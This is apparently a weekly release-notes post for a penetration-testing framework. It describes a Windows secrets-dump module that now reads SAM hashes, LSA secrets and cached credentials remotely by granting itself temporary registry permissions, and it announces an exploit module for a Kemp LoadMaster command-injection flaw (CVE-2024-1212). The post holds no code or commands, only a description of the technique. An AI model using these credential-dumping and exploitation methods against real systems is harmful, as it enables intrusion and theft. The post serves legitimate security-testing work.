Dump secrets inline This week, our very own cdelafuente-r7 added a significant improvement to the well-known Windows Secrets Dump module to reduce the footprint when dumping SAM hashes, LSA secrets and cached credentials. The module is now directly reading the Windows Registry remotely without having to dump the full registry keys to disk and parse them, like it was originally. This idea comes from this PR proposed by antuache. The technique takes advantage of the WriteDACL privileges held by local administrators to set temporary read permissions on the SAM and SECURITY registry hives. The module also takes care of restoring the original Security Descriptors after each read. Note that it is still possible to use the original technique by setting the INLINE option to false. Happy dumping! New module content (1) Kemp LoadMaster Unauthenticated Command Injection Author: Dave Yesland with Rhino Security Labs Type: Exploit Pull request: #18972 contributed by DaveYesland Path: linux/http/progress_kemp_loadmaster_unauth_cmd_injection AttackerKB reference: CVE-2024-1212 Description: This adds a module targeting CVE-2024-1212, an unauthenticated command injection vulnerability in Kemp Progress Loadmaster versions after 7.2.48.1, but patched in 7.2.59.2 (GA), 7.2.54.8 (LTSF) and 7.2.48.10 (LTS). Enhancements and features (3) #19048 from cdelafuente-r7 – This updates the windows_secrets_dump module to enable accessing the necessary registry data without writing it to disk first….Read More